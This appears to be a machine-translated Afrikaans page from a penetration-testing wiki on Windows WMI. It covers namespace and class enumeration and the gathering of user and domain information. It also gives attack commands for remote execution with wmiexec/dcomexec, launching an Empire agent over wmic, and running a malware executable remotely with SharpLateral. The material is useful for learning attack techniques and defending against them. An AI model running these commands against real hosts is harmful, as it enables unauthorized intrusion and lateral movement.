Hoe Dit Werk Word Verduidelik

Prosesse kan op gasheer-rekenaars geopen word waar die gebruikersnaam en óf wagwoord of hasj bekend is deur die gebruik van WMI. Opdragte word uitgevoer met behulp van WMI deur Wmiexec, wat 'n semi-interaktiewe skilervaring bied.

dcomexec.py: Deur verskillende DCOM-eindpunte te benut, bied hierdie skrip 'n semi-interaktiewe skil soortgelyk aan wmiexec.py, wat spesifiek die ShellBrowserWindow DCOM-voorwerp benut. Dit ondersteun tans MMC20. Toepassing, Skelmuurvensters, en Skelblaaier-venster-voorwerpe. (bron: Hacking Articles)

WMI Fundamentele Beginsels

Naamruimte

Gestruktureer in 'n gidsstyl-hierargie, is WMI se topvlakhouer \root, waarby addisionele gidse, bekend as name spaces, georganiseer is. Opdragte om name spaces te lys:

# Retrieval of Root namespaces
gwmi -namespace "root" -Class "__Namespace" | Select Name

# Enumeration of all namespaces (administrator privileges may be required)
Get-WmiObject -Class "__Namespace" -Namespace "Root" -List -Recurse 2> $null | select __Namespace | sort __Namespace

# Listing of namespaces within "root\cimv2"
Get-WmiObject -Class "__Namespace" -Namespace "root\cimv2" -List -Recurse 2> $null | select __Namespace | sort __Namespace

Klasse binne 'n namespace kan gelys word deur gebruik te maak van:

gwmwi -List -Recurse # Defaults to "root\cimv2" if no namespace specified
gwmi -Namespace "root/microsoft" -List -Recurse

Klasse

Om 'n WMI-klasnaam te ken, soos win32_process, en die namespace waarin dit bestaan, is noodsaaklik vir enige WMI-operasie. Opdragte om klasse te lys wat begin met win32:

Get-WmiObject -Recurse -List -class win32* | more # Defaults to "root\cimv2"
gwmi -Namespace "root/microsoft" -List -Recurse -Class "MSFT_MpComput*"

Aanroeping van 'n klas:

# Defaults to "root/cimv2" when namespace isn't specified
Get-WmiObject -Class win32_share
Get-WmiObject -Namespace "root/microsoft/windows/defender" -Class MSFT_MpComputerStatus

Metodes

Metodes, wat een of meer uitvoerbare funksies van WMI-klasse is, kan uitgevoer word.

# Class loading, method listing, and execution
$c = [wmiclass]"win32_share"
$c.methods
# To create a share: $c.Create("c:\share\path","name",0,$null,"My Description")

# Method listing and invocation
Invoke-WmiMethod -Class win32_share -Name Create -ArgumentList @($null, "Description", $null, "Name", $null, "c:\share\path",0)

WMI Enumerasie

WMI Diens Status

Opdragte om te verifieer of die WMI-diens operasioneel is:

# WMI service status check
Get-Service Winmgmt

# Via CMD
net start | findstr "Instrumentation"

Stelsel- en Prosesherinligting

Inligting oor stelsels en prosesse word deur WMI ingesamel:

Get-WmiObject -ClassName win32_operatingsystem | select * | more
Get-WmiObject win32_process | Select Name, Processid

Vir aanvallers is WMI 'n kragtige instrument om sensitiewe data oor stelsels of domeine te ontleed.

wmic computerystem list full /format:list
wmic process list /format:list
wmic ntdomain list /format:list
wmic useraccount list /format:list
wmic group list /format:list
wmic sysaccount list /format:list

Handmatige Afgeleë WMI-navrae

Heimlike identifikasie van plaaslike admins op 'n afgeleë rekenaar en aangemelde gebruikers kan bereik word deur spesifieke WMI-navrae. wmic ondersteun ook lees vanaf 'n tekslêer om op meerdere nodes gelyktydig opdragte uit te voer.

Om 'n proses oor WMI afgeleë uit te voer, soos die implementering van 'n Empire-agent, word die volgende opdragstruktuur gebruik, met suksesvolle uitvoering aangedui deur 'n terugvoerwaarde van "0":

wmic /node:hostname /user:user path win32_process call create "empire launcher string here"

Hierdie proses illustreer WMI se vermoë vir afgeleë uitvoering en stelselopsomming, wat sy nuttigheid vir beide stelseladministrasie en indringingstoetsing beklemtoon.

Verwysings

• https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-3-wmi-and-winrm/

Outomatiese Gereedskap

• SharpLateral:

SharpLateral redwmi HOSTNAME C:\\Users\\Administrator\\Desktop\\malware.exe